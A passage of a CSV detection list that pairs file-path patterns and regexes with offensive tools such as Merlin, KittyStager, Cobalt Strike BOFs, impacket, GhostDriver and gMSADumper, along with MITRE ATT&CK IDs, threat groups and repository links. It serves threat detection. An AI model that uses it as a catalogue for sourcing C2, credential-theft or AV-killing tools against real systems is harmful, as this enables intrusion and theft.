TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Get-InjectedThread.ps1*",".{0,1000}\/Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/getLegit/cdnl*",".{0,1000}\/getLegit\/cdnl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/grkg*",".{0,1000}\/getLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/prvw*",".{0,1000}\/getLegit\/prvw.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/qhwl*",".{0,1000}\/getLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/tsom*",".{0,1000}\/getLegit\/tsom.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/getLegit/zijz*",".{0,1000}\/getLegit\/zijz.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/get-loggedon/*.c*",".{0,1000}\/get\-loggedon\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/Get-OSTokenInformation.ps1*",".{0,1000}\/Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/GetPasswords.ps1*",".{0,1000}\/GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/Get-ScheduledTaskComHandler.ps1*",".{0,1000}\/Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/get-shucking.php*",".{0,1000}\/get\-shucking\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*/getST.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/get-system/getsystem.c*",".{0,1000}\/get\-system\/getsystem\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Get-TGSCipher.ps1*",".{0,1000}\/Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/GetWebDAVStatus_BOF/*",".{0,1000}\/GetWebDAVStatus_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","104","26","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z" "*/ghauri.git*",".{0,1000}\/ghauri\.git.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghauri.py*",".{0,1000}\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghauri/ghauri/*",".{0,1000}\/ghauri\/ghauri\/.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*/ghidra*",".{0,1000}\/ghidra.{0,1000}","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","47772","5541","2024-04-30T18:05:15Z","2019-03-01T03:27:48Z" "*/GhostDriver.exe*",".{0,1000}\/GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/GhostDriver.git*",".{0,1000}\/GhostDriver\.git.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/ghostdriver.sys*",".{0,1000}\/ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "*/ghostfile.aspx*",".{0,1000}\/ghostfile\.aspx.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*/GhostInTheNet.git*",".{0,1000}\/GhostInTheNet\.git.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet.sh*",".{0,1000}\/GhostInTheNet\.sh.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet-master*",".{0,1000}\/GhostInTheNet\-master.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","364","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostMapper.git*",".{0,1000}\/GhostMapper\.git.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*/GhostMapper.sln*",".{0,1000}\/GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*/GhostTask.git*",".{0,1000}\/GhostTask\.git.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*/gimmeSH.sh*",".{0,1000}\/gimmeSH\.sh.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","183","29","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*/giop-info.nse*",".{0,1000}\/giop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GithubC2.git*",".{0,1000}\/GithubC2\.git.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*/gkrellm-info.nse*",".{0,1000}\/gkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/glit.git*",".{0,1000}\/glit\.git.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/glit-cli*",".{0,1000}\/glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/glit-core*",".{0,1000}\/glit\-core.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*/globeimposter.profile*",".{0,1000}\/globeimposter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/gmailC2.exe*",".{0,1000}\/gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*/gMSA_dump_*.txt*",".{0,1000}\/gMSA_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/gMSADumper*",".{0,1000}\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/GMSAPasswordReader.git*",".{0,1000}\/GMSAPasswordReader\.git.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","160","29","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*/gobuster.git*",".{0,1000}\/gobuster\.git.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobuster/*",".{0,1000}\/gobuster\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobusterdir/*",".{0,1000}\/gobusterdir\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobusterdns/*",".{0,1000}\/gobusterdns\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gobustergcs/*",".{0,1000}\/gobustergcs\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/gocrack.git*",".{0,1000}\/gocrack\.git.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack/.hashcat*",".{0,1000}\/gocrack\/\.hashcat.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack/server*",".{0,1000}\/gocrack\/server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack_server*",".{0,1000}\/gocrack_server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack_worker*",".{0,1000}\/gocrack_worker.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/gocrack-1.0.zip*",".{0,1000}\/gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/goDoH.git*",".{0,1000}\/goDoH\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" 